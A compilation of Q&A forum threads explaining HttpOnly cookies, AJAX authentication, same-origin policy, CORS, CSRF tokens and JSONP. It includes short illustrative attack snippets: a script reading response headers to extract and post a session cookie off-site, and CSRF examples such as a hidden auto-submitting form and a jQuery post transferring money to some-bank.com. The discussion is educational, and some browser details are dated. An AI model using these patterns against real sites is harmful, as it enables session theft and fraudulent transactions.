JavaScript needs access to cookies if AJAX is used on a site with access restrictions based on cookies. Will HttpOnly cookies work on an AJAX site?
Edit: Microsoft created a way to prevent XSS attacks by disallowing JavaScript access to cookies if HttpOnly is specified. FireFox later adopted this. So my question is: If you are using AJAX on a site, like StackOverflow, are Http-Only cookies an option?
Edit 2: Question 2. If the purpose of HttpOnly is to prevent JavaScript access to cookies, and you can still retrieve the cookies via JavaScript through the XmlHttpRequest Object, what is the point of HttpOnly?
Edit 3: Here is a quote from Wikipedia:
When the browser receives such a cookie, it is supposed to use it as usual in the following HTTP exchanges, but not to make it visible to client-side scripts.[32] The HttpOnly flag is not part of any standard, and is not implemented in all browsers. Note that there is currently no prevention of reading or writing the session cookie via a XMLHTTPRequest. [33].
I understand that document.cookie is blocked when you use HttpOnly. But it seems that you can still read cookie values in the XMLHttpRequest object, allowing for XSS. How does HttpOnly make you any safer than? By making cookies essentially read only?
In your example, I cannot write to your document.cookie, but I can still steal your cookie and post it to my domain using the XMLHttpRequest object.
<script type="text/javascript">
var req = null;
try { req = new XMLHttpRequest(); } catch(e) {}
if (!req) try { req = new ActiveXObject("Msxml2.XMLHTTP"); } catch(e) {}
if (!req) try { req = new ActiveXObject("Microsoft.XMLHTTP"); } catch(e) {}
req.open('GET', 'http://stackoverflow.com/', false);
req.send(null);
alert(req.getAllResponseHeaders());
</script>
Edit 4: Sorry, I meant that you could send the XMLHttpRequest to the StackOverflow domain, and then save the result of getAllResponseHeaders() to a string, regex out the cookie, and then post that to an external domain. It appears that Wikipedia and ha.ckers concur with me on this one, but I would love be re-educated...
Final Edit: Ahh, apparently both sites are wrong, this is actually a bug in FireFox. IE6 & 7 are actually the only browsers that currently fully support HttpOnly.
To reiterate everything I've learned:
HttpOnly restricts all access to document.cookie in IE7 & and FireFox (not sure about other browsers)
HttpOnly removes cookie information from the response headers in XMLHttpObject.getAllResponseHeaders() in IE7.
XMLHttpObjects may only be submitted to the domain they originated from, so there is no cross-domain posting of the cookies.
edit: This information is likely no longer up to date.
Yes, HTTP-Only cookies would be fine for this functionality. They will still be provided with the XmlHttpRequest's request to the server.
In the case of Stack Overflow, the cookies are automatically provided as part of the XmlHttpRequest request. I don't know the implementation details of the Stack Overflow authentication provider, but that cookie data is probably automatically used to verify your identity at a lower level than the "vote" controller method.
More generally, cookies are not required for AJAX. XmlHttpRequest support (or even iframe remoting, on older browsers) is all that is technically required.
However, if you want to provide security for AJAX enabled functionality, then the same rules apply as with traditional sites. You need some method for identifying the user behind each request, and cookies are almost always the means to that end.
In your example, I cannot write to your document.cookie, but I can still steal your cookie and post it to my domain using the XMLHttpRequest object.
XmlHttpRequest won't make cross-domain requests (for exactly the sorts of reasons you're touching on).
You could normally inject script to send the cookie to your domain using iframe remoting or JSONP, but then HTTP-Only protects the cookie again since it's inaccessible.
Unless you had compromised StackOverflow.com on the server side, you wouldn't be able to steal my cookie.
Edit 2: Question 2. If the purpose of Http-Only is to prevent JavaScript access to cookies, and you can still retrieve the cookies via JavaScript through the XmlHttpRequest Object, what is the point of Http-Only?
Consider this scenario:
I find an avenue to inject JavaScript code into the page.
Jeff loads the page and my malicious JavaScript modifies his cookie to match mine.
Jeff submits a stellar answer to your question.
Because he submits it with my cookie data instead of his, the answer will become mine.
You vote up "my" stellar answer.
My real account gets the point.
With HTTP-Only cookies, the second step would be impossible, thereby defeating my XSS attempt.
Edit 4: Sorry, I meant that you could send the XMLHttpRequest to the StackOverflow domain, and then save the result of getAllResponseHeaders() to a string, regex out the cookie, and then post that to an external domain. It appears that Wikipedia and ha.ckers concur with me on this one, but I would love be re-educated...
That's correct. You can still session hijack that way. It does significantly thin the herd of people who can successfully execute even that XSS hack against you though.
However, if you go back to my example scenario, you can see where HTTP-Only does successfully cut off the XSS attacks which rely on modifying the client's cookies (not uncommon).
It boils down to the fact that a) no single improvement will solve all vulnerabilities and b) no system will ever be completely secure. HTTP-Only is a useful tool in shoring up against XSS.
Similarly, even though the cross domain restriction on XmlHttpRequest isn't 100% successful in preventing all XSS exploits, you'd still never dream of removing the restriction.
Yes, they are a viable option for an Ajax based site. Authentication cookies aren't for manipulation by scripts, but are simply included by the browser on all HTTP requests made to the server.
Scripts don't need to worry about what the session cookie says - as long as you are authenticated, then any requests to the server initiated by either a user or the script will include the appropriate cookies. The fact that the scripts cannot themselves know the content of the cookies doesn't matter.
For any cookies that are used for purposes other than authentication, these can be set without the HTTP only flag, if you want script to be able to modify or read these. You can pick and choose which cookies should be HTTP only, so for example anything non-sensitive like UI preferences (sort order, collapse left hand pane or not) can be shared in cookies with the scripts.
I really like the HTTP only cookies - it's one of those proprietary browser extensions that was a really neat idea.
Not necessarily, it depends what you want to do. Could you elaborate a bit? AJAX doesn't need access to cookies to work, it can make requests on its own to extract information, the page request that the AJAX call makes could access the cookie data & pass that back to the calling script without Javascript having to directly access the cookies
As clarification - from the server's perspective, the page that is requested by an AJAX request is essentially no different to a standard HTTP get request done by the user clicking on a link. All the normal request properties: user-agent, ip, session, cookies, etc. are passed to the server.
There's a bit more to this.
Ajax doesn't strictly require cookies, but they can be useful as other posters have mentioned. Marking a cookie HTTPOnly to hide it from scripts only partially works, because not all browsers support it, but also because there are common workarounds.
It's odd that the XMLHTTPresponse headers are giving the cookie, technically the server doesn't have to return the cookie with the response. Once it's set on the client, it stays set until it expires. Though there are schemes in which the cookie is changed with every request to prevent re-use. So you may be able to avoid that workaround by changing the server to not provide the cookie on the XMLHTTP responses.
In general though, I think HTTPOnly should be used with some caution. There are cross site scripting attacks where an attacker arranges for a user to submit an ajax-like request originating from another site, using simple post forms, without the use of XMLHTTP, and your browser's still-active cookie would authenticate the request.
If you want to be sure that an AJAX request is authenticated, the request itself AND the HTTP headers need to contain the cookie. Eg through the use of scripts or unique hidden inputs. HTTPOnly would hinder that.
Usually the interesting reason to want HTTPOnly is to prevent third-party content included on your webpage from stealing cookies. But there are many interesting reasons to be very cautious about including third-party content, and filter it aggressively.
Cookies are automatically handled by the browser when you make an AJAX call, so there's no need for your Javascript to mess around with cookies.
Therefore I am assuming JavaScript needs access to your cookies.
All HTTP requests from your browser transmit your cookie information for the site in question. JavaScript can both set and read cookies. Cookies are not by definition required for Ajax applications, but they are required for most web applications to maintain user state.
The formal answer to your question as phrased - "Does JavaScript need access to cookies if AJAX is used?" - is therefore "no". Think of enhanced search fields that use Ajax requests to provide auto-suggest options, for example. There is no need of cookie information in that case.
No, the page that the AJAX call requests has access to cookies too & that's what checks whether you're logged in.
You can do other authentication with the Javascript, but I wouldn't trust it, I always prefer putting any sort of authentication checking in the back-end.
Yes, cookies are very useful for Ajax.
Putting the authentication in the request URL is bad practice. There was a news item last week about getting the authentication tokens in the URL's from the google cache.
No, there is no way to prevent attacks. Older browsers still allow trivial access to cookies via javascript. You can bypass http only, etc. Whatever you come up with can be gotten around given enough effort. The trick is to make it too much effort to be worthwhile.
If you want to make your site more secure (there is no perfect security) you could use an authentication cookie that expires. Then, if the cookie is stolen, the attacker must use it before it expires. If they don't then you have a good indication there's suspicious activity on that account. The shorter the time window the better for security but the more load it puts on your server generating and maintaining keys.
Related
Is there anyway to access a secure cookie from a Greasemonkey script?
I wrote script that uses the document.cookie.split function. It returns a list of cookies but it doesn't included the secure cookie(s).
I'm guessing you really mean cookies with the HttpOnly attribute set. (See, also, Wikipedia for HttpOnly cookie.)
In that case, you cannot access these cookies from Greasemonkey because they are forbidden to JavaScript, and because Greasemonkey does not provide an alternate mechanism to see them.
You can try making a feature request, but I'm not optimistic about its reception. (Try anyway.)
Firefox add-ons, can work with these cookies, so you can fork the Greasemonkey source yourself or write a helper add-on (example) to get to these cookies.
If you mean cookies with the Secure attribute (Cookies that must be sent only over HTTPS), then I believe you can access those from injected code in the target page scope, but I'm not set up to test this at the moment. (The target page must be loaded over HTTPS and on the exact same domain as the cookies you want.)
I was trying to understand CORS. As per my understanding, it is a security mechanism implemented in browsers to avoid any AJAX request to domain other than the one open by the user (specified in the URL).
Now, due to this limitation many CORS was implemented to enable websites to do cross origin request. but as per my understanding implementing CORS defy the security purpose of the "Same Origin Policy" (SOP).
CORS is just to provide extra control over which request server wants to serve. Maybe it can avoid spammers.
From Wikipedia:
To initiate a cross-origin request, a browser sends the request with
an Origin HTTP header. The value of this header is the site that
served the page. For example, suppose a page on
http://www.social-network.example attempts to access a user's data
in online-personal-calendar.example. If the user's browser implements
CORS, the following request header would be sent:
Origin: http://www.social-network.example
If online-personal-calendar.example allows the request, it sends an
Access-Control-Allow-Origin header in its response. The value of the
header indicates what origin sites are allowed. For example, a
response to the previous request would contain the following:
Access-Control-Allow-Origin: http://www.social-network.example
If the server does not allow the cross-origin request, the browser
will deliver an error to social-network.example page instead of
the online-personal-calendar.example response.
To allow access to all pages, a server can send the following response
header:
Access-Control-Allow-Origin: *
However, this might not be appropriate for situations in which
security is a concern.
What am I missing here? what is the the intend of CORS to secure the server vs secure the client.
Same-origin policy
What is it?
The same-origin policy is a security measure standardized among browsers. The "origin" mostly refers to a "domain". It prevents different origins from interacting with each other, to prevent attacks such as Cross Site Request Forgery.
How does a CSRF attack work?
Browsers allow websites to store information on a client's computer, in the form of cookies. These cookies have some information attached to them, like the name of the cookie, when it was created, when it will expire, who set the cookie etc. A cookie looks something like this:
Cookie: cookiename=chocolate; Domain=.bakery.example; Path=/ [// ;otherDdata]
So this is a chocolate cookie, which should be accessible from http://bakery.example and all of its subdomains.
This cookie might contain some sensitive data. In this case, that data is... chocolate. Highly sensitive, as you can see.
So the browser stores this cookie. And whenever the user makes a request to a domain on which this cookie is accessible, the cookie would be sent to the server for that domain. Happy server.
This is a good thing. Super cool way for the server to store and retrieve information on and from the client-side.
But the problem is that this allows http://malicious-site.example to send those cookies to http://bakery.example, without the user knowing! For example, consider the following scenario:
# malicious-site.example/attackpage
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://bakery.example/order/new?deliveryAddress="address of malicious user"');
xhr.send();
If you visit the malicious site, and the above code executes, and same-origin policy was not there, the malicious user would place an order on behalf of you, and get the order at his place... and you might not like this.
This happened because your browser sent your chocolate cookie to http://bakery.example, which made http://bakery.example think that you are making the request for the new order, knowingly. But you aren't.
This is, in plain words, a CSRF attack. A forged request was made across sites. "Cross Site Request Forgery". And it would not work, thanks to the same-origin policy.
How does Same-origin policy solve this?
It stops the malicious-site.example from making requests to other domains. Simple.
In other words, the browser would not allow any site to make a request to any other site. It would prevent different origins from interacting with each other through such requests, like AJAX.
However, resource loading from other hosts like images, scripts, stylesheets, iframes, form submissions etc. are not subject to this limitation. We need another wall to protect our bakery from malicious site, by using CSRF Tokens.
CSRF Tokens
As stated, malicious site can still do something like this without violating the same-origin policy:
<img src='http://bakery.example/order/new?deliveryAddress="address of malicious user"'/>
And the browser will try to load an image from that URL, resulting in a GET request to that URL sending all the cookies. To stop this from happening, we need some server side protection.
Basically, we attach a random, unique token of suitable entropy to the user's session, store it on the server, and also send it to the client with the form. When the form is submitted, client sends that token along with the request, and server verifies if that token is valid or not.
Now that we have done this, and malicious website sends the request again, it will always fail since there is no feasible way for the malicious website to know the token for user's session.
CORS
When required, the policy can be circumvented, when cross site requests are required. This is known as CORS. Cross Origin Resource Sharing.
This works by having the "domains" tell the browser to chill, and allow such requests. This "telling" thing can be done by passing a header. Something like:
Access-Control-Allow-Origin: //comma separated allowed origins list, or just *
So if http://bakery.example passes this header to the browser, and the page creating the request to http://bakery.example is present in the origin list, then the browser will let the request go, along with the cookies.
There are rules according to which the origin is defined1. For example, different ports for the same domain are not the same origin. So the browser might decline this request if the ports are different. As always, our dear Internet Explorer is the exception to this. IE treats all ports the same way. This is non-standard and no other browser behaves this way. Do not rely on this.
JSONP
JSON with Padding is just a way to circumvent same-origin policy, when CORS is not an option. This is risky and a bad practice. Avoid using this.
What this technique involves is making a request to the other server like following:
<script src="http://badbakery.example/jsonpurl?callback=cake"></script>
Since same-origin policy does not prevent this2 request, the response of this request will be loaded into the page.
This URL would most probably respond with JSON content. But just including that JSON content on the page is not gonna help. It would result in an error, ofcourse. So http://badbakery.example accepts a callback parameter, and modifies the JSON data, sending it wrapped in whatever is passed to the callback parameter.
So instead of returning,
{ user: "vuln", acc: "B4D455" }
which is invalid JavaScript throwing an error, it would return,
cake({user: "vuln", acc:"B4D455"});
which is valid JavaScript, it would get executed, and probably get stored somewhere according to the cake function, so that the rest of the JavaScript on the page can use the data.
This is mostly used by APIs to send data to other domains. Again, this is a bad practice, can be risky, and should be strictly avoided.
Why is JSONP bad?
First of all, it is very much limited. You can't handle any errors if the request fails (at-least not in a sane way). You can't retry the request, etc.
It also requires you to have a cake function in the global scope which is not very good. May the cooks save you if you need to execute multiple JSONP requests with different callbacks. This is solved by temporary functions by various libraries but is still a hackish way of doing something hackish.
Finally, you are inserting random JavaScript code in the DOM. If you aren't 100% sure that the remote service will return safe cakes, you can't rely on this.
References
1. https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy#Definition_of_an_origin
2. https://www.w3.org/Security/wiki/Same_Origin_Policy#Details
Other worthy reads
http://scarybeastsecurity.blogspot.dk/2009/12/generic-cross-browser-cross-domain.html
https://www.rfc-editor.org/rfc/rfc3986 (sorry :p)
https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
The Same Origin Policy (SOP) is the policy browsers implement to prevent vulnerabilities via Cross Site Scripting (XSS). This is mainly for protecting the server, as there are many occasions when a server can be dealing with authentication, cookies, sessions, etc.
The Cross Origin Resource Sharing (CORS) is one of the few techniques for relaxing the SOP. Because SOP is "on" by default, setting CORS at the server-side will allow a request to be sent to the server via an XMLHttpRequest even if the request was sent from a different domain. This becomes useful if your server was intended to serve requests from other domains (e.g. if you are providing an API).
I hope this clears up the distinction between SOP and CORS and the purposes of each.
I'm trying to determine the most secure method for an ajax based login form to authenticate and set a client side cookie. I've seen things about XSS attacks such as this:
How do HttpOnly cookies work with AJAX requests?
and
http://www.codinghorror.com/blog/archives/001167.html
So, I guess my core questions are...
1) Is using pure ajax to set cookies secure, if so, what is the most secure method (httpOnly + SSL + encrypted values, etc.)?
2) Does a pure ajax method involve setting the cookie client side? Is this at all secure?
3) Is setting cookies this way reliable across all major browsers/OSs?
4) Would using a hidden IFrame be any more secure (calling a web page to set the cookies)?
5) If possible, does anybody have code for this (PHP is my backend)?
My goal is to set the cookies and have them available for the next call to the server without navigating away from the page.
I really want to nail down the consensus, most secure way to do this. Eventually, this code is planned to be made Open Source, so please no commercial code (or nothing that wouldn't stand up to public scrutiny)
Thanks,
-Todd
The cookie needs to be generated server-side because the session binds the client to the server, and therefore the token exchange must go from server to client at some stage. It would not really be useful to generate the cookie client-side, because the client is the untrusted remote machine.
It is possible to have the cookie set during an AJAX call. To the server (and the network) an AJAX call is simply an HTTP call, and any HTTP response by the server can set a cookie. So yes, it is possible to initiate a session in response to an AJAX call, and the cookie will be stored by the client as normal.
So, you can use AJAX to do the logging in process in the same was as you could have just relied on a POST from a form on the page. The server will see them the same way, and if the server sets a cookie the browser will store it.
Basically, client-side Javascript never needs to be able to know the value of the cookie (and it is better for security if it doesn't, which can be achieved using the "httponly" cookie extension honored by recent browsers). Note that further HTTP calls from the client to the server, whether they are normal page requests or they are AJAX requests, will include that cookie automatically, even if it's marked httponly and the browser honors that extension. Your script does not need to be 'aware' of the cookie.
You mentioned using HTTPS (HTTP over SSL) - that prevents others from being able to read information in transit or impersonate the server, so it's very handy for preventing plain text transmission of the password or other important information. It can also help guard against network based attacks, though it does not make you immune to everything that CSRF can throw you, and it does not at all protect you against the likes of session fixation or XSS. So I would avoid thinking of HTTPS as a fix-all if you use it: you still need to be vigilant about cross-site scripting and cross-site request forgery.
(see 1. I sort of combined them)
Given that the cookie is set by the server in its HTTP response headers, yes it is reliable. However, to make it cross-browser compatible you still need to ensure logging in is possible when AJAX is unavailable. This may require implementing an alternative that is seen only when there is no Javascript or if AJAX isn't available. (Note: now in 2014, you don't need to worry about browser support for AJAX anymore).
It would not change the security. There would be no need for it, except that I have seen hidden iframes used before to 'simulate' AJAX before - ie make asyncronous calls to the server. Basically, however you do it doesn't matter, it's the server setting the cookie, and the client will accept and return the cookie whether it does it by AJAX or not.
For the most part, whether you use AJAX or not does not affect the security all that much as all the real security happens on the server side, and to the server an AJAX call is just like a non-AJAX call: not to be trusted. Therefore you'll need to be aware of issues such as session fixation and login CSRF as well as issues affecting the session as a whole like CSRF and XSS just as much as you would if you were using no AJAX. The issues don't really change when using AJAX except, except, I guess, that you may make more mistakes with a technology if you're less familiar with it or it's more complicated.
Answer updated September 2014
Why was it decided that using XMLHTTPRequest for doing XML calls should not do calls across the domain boundary? You can retrieve JavaScript, images, CSS, iframes, and just about any other content I can think of from other domains. Why are the Ajax HTTP requests not allowed to cross the domain boundaries? It seems like an odd limitation to put, considering the only way I could see it being abused, would be if someone were to inject Javascript into the page. However, in this case, you could simply add an img, script, or iframe element to the document to get it to request the third party URL and send it to the server.
[Edit]
Some of the answers point out the following reasons, let's point out the reasons they don't create a major reason to disallow this.
XSRF (Cross Site Request Forgery, also known as CSRF, XSRF)
Your can do XSRF attacks without using this at all. As a general rule, XMLHTTPRequest isn't used at all, simply because it's so hard to make an XMLHTTPRequest in a way that's compatible with all major browsers. It's much easier to just add an img tag to the URL if you want them to load your URL.
Posting to third party site
<script type="text/javascript">
$.post("http://some-bank.com/transfer-money.php",
{ amount: "10000", to_account: "xxxx" })
</script>
Could be accomplished with
<body onload="document.getElementById('InvisbleForm').submit()"
<div style="display:none">
<form id="InvisbleForm" action="http://some-bank.com/transfer-money.php" method="POST">
<input type="hidden" name="amount" value="10000">
<input type="hidden" name="to_account" value="xxxxx">
</form>
</div>
</body>
JPunyon: why would you leave the vulnerability in a new feature
You aren't creating any more insecurities. You are just inconveniencing developers who want to use it in a way for good. Anybody who wants to use this feature for evil (aka awesome) could just use some other method of doing it.
Conclusion
I'm marking the answer from bobince as correct because he pointed out the critical problem. Because XMLHTTPRequest allows you to post, with credentials (cookies) to the destination site, and read the data sent back from the site, along with sending the persons credentials, you could orchestrate some javascript that would submit a series of forms, including confirmation forms, complete with any random keys generated that were put in place to try to prevent a XSRF. In this way, you could browse through the target site, like a bank, and the bank's webserver would be unable to tell that it wasn't just a regular user submitting all these forms.
Why are Ajax HTTP Requests not allowed to cross domain boundaries.
Because AJAX requests are (a) submitted with user credentials, and (b) allow the caller to read the returned data.
It is a combination of these factors that can result in a vulnerability. There are proposals to add a form of cross-domain AJAX that omits user credentials.
you could simply add an img, script, or iframe element to the document
None of those methods allow the caller to read the returned data.
(Except scripts where either it's deliberately set up to allow that, for permitted cross-domain scripting - or where someone's made a terrible cock-up.)
Your can do XSS attacks without using this at all. Posting to third party site
That's not an XSS attack. That's a cross-site request forgery attack (XSRF). There are known ways to solve XSRF attacks, such as including one-time or cryptographic tokens to verify that the submission came deliberately from the user and was not launched from attacker code.
If you allowed cross-domain AJAX you would lose this safeguard. The attacking code could request a page from the banking site, read any authorisation tokens on it, and submit them in a second AJAX request to perform the transfer. And that would be a cross-site scripting attack.
An important difference between the POST:
<body onload="document.getElementById('InvisbleForm').submit()" ...
and Ajax is that after doing any POST the browser will replace the page and after doing the Ajax call - not. The result of the POST will be:
Clearly visible to the user.
The attack will be stuck at this point because the response page from my-bank.com will take the control. No bank will implement a one-click-transfer.
The scenario of XSRF, if the cross domain Ajax would be allowed, will look like the following:
User somehow visits www.bad-guy.com.
If there no opened page to my-bank.com in other instance of the browser, the attack is unsuccessful.
But if such page is opened and the user has already entered his user-name/password, this means that there is a cookie for this session in the cache of the browser.
JavaScript code on the page from www.bad-guy.com makes an Ajax call to my-bank.com.
For the browser this is a regular HTTP call, it has to send the my-bank cookies to my-bank.com and it sends them.
Bank processes this request because it cannot distinguish this call from the regular activity of the user.
The fact that JavaScript code can read the response is not important. In the attack case this might be not necessary. What is really important is that the user in front of the computer will have no idea that this interaction takes place. He will look at nice pictures on the www.bad-guy.com page.
JavaScript code makes several other calls to my-bank.com if this is needed.
The gist is that no injection or any page tampering is needed.
A better solution might be to allow the call itself but not to send any cookies. This is very simple solution that does not require any extensive development. In many cases Ajax call goes to unprotected location and not sending cookies will not be a limitation.
The CORS (Cross Origin Resource Sharing) that is under discussion now, among other things, speaks about sending/not sending cookies.
Well, apparently you're not the only person that feels that way...
http://www.google.com/search?q=xmlhttp+cross+site
EDIT: There is an interesting discussion linked from the above search:
http://blogs.msdn.com/ie/archive/2008/06/23/securing-cross-site-xmlhttprequest.aspx
Looks like proposals are under way to permit cross site xmlhttp requests (IE 8, FF3 etc.), although I wish they'd been there when I was writing the code for my sites :)
And then there's the problem of compatibility... It will be a while before it's ubiquitous.
When you send a HTTP request to the server, the cookies set by the server are also sent back by the browser to the server. The server uses those cookies to establish the fact that the user is logged in, etc.
This can be exploited by a malicious attacker who, with the help of some JavaScript, can steal information or perform unauthorised commands on other websites without the user knowing anything about this.
For example, one could ask an user to visit a site which has the following JavaScript code (assuming jQuery):
<script type="text/javascript">
$.post("http://some-bank.com/transfer-money.php",
{ amount: "10000", to_account: "xxxx" })
</script>
Now, if the user were really logged into the bank while the above code was executed, the attacker could have transferred USD 10K to the account XXX.
This kind of attacks are called Cross Site Request Forgery (XSRF). There is more info about this on Wikipedia.
It's mainly due to this reason the same-origin policy exists and browsers won't allow you to perform XMLHttpRequests on domains different from the origin.
There is some discussion going on to actually allow cross-domain XHR, but we have to see whether this really gets accepted.
It's a concern because it can be used for bad purposes, as you mentioned. It can also be used with good intent, and for that reason, cross domain protocols are being developed.
The two biggest concerns are when it is used in conjunction with cross-site scripting (XSS) and cross-site request forgery (CSRF). Both are serious threats (which is why they made it into the OWASP top 10 and the SANS 25).
the only way I could see it being abused, would be if someone were to inject Javascript
This is XSS Far too many apps are still vulnerable, and if browser security models don't prevent X-domain AJAX, they are opening their users to a considerable attack vector.
you could simply add an img, script, or iframe element to the document to get it to request the third party URL
Yes, but those will send a HTTP_REFERRER and (through other means) can be blocked to prevent CSRF. AJAX calls can spoof headers more easily and would allow other means of circumventing traditional CSRF protections.
I think another thing that separates this from a normal XSRF attack is that you can do stuff with the data you get back as well via javascript.
I don't know what the huge problem is? Have AJAX calls sent towards other domains firs sent to your application and then forwarded elsewhere with filtered data, parse the returned data if you really need to, and feed it to the user.
Handling sensitive AJAX requests? Nail down the incoming suckers by checking for headers, storing session time data or by filtering incoming IP addresses down to sources of you trust or your applications.
What I'd personally like to see in the future is rock solid security on all incoming requests by default on web servers, frameworks and CMSs, and then explicitly define resources that will parse request from outside sources.
With <form> you can post data, but you can't read it. With XHR you can do both.
Page like http://bank.example.com/display_my_password is safe against XSRF (assuming it only displays and not sets the password) and frames (they have same-origin policy). However cross-domain XHR would be a vulnerability.
You turn unsuspecting visitors into denial of service attackers.
Also, Imagine a cross site script that steals all your facebook stuff. It opens an IFrame and navigates to Facebook.com
You're already logged in to facebook (cookie) and it goes reads your data/friends. And does more nasties.
I have done a bit of testing on this myself (During the server side processing of a DWR Framework Ajax request handler to be exact) and it seems you CAN successfully manipulate cookies, but this goes against much that I have read on Ajax best practices and how browsers interpret the response from an XmlHttpRequest. Note I have tested on:
IE 6 and 7
Firefox 2 and 3
Safari
and in all cases standard cookie operations on the HttpServletResponse object during Ajax request handling were correctly interpreted by the browser, but I would like to know if it best practice to push the cookie manipulation to the client side, or if this (much cleaner) server side cookie handling can be trusted.
I would welcome answers both specific to the DWR Framework and Ajax in general.
XMLHttpRequest always uses the Web Browser's connection framework. This is a requirement for AJAX programs to work correctly as the user would get logged out if the XHR object lacked access to the browser's cookie pool.
It's theoretically possible for a web browser to simply share session cookies without using the browser's connection framework, but this has never (to my knowledge) happened in practice. Even the Flash plugin uses the Web Browser's connections.
Thus the end result is that it IS safe to manipulate cookies via AJAX. Just keep in mind that the AJAX call might never happen. They are not guaranteed events, so don't count on them.
In the context of DWR it may not be "safe".
From reading the DWR site it says:
It is important that you treat the HTTP request and response as read-only. While HTTP headers might get through OK, there is a good chance that some browsers will ignore them.
I've taken this to mean that setting cookies or request attributes is a no-no.
Saying that, I have code which does set request attributes (code I wrote before I read that page) and it appears to work fine (apart from deleting cookies which I mentioned in my comment above).
Manipulating cookies on the client side is rather the opposite of "best practice". And it shouldn't be necessary, either. HttpOnly cookies weren't introduced for nothing.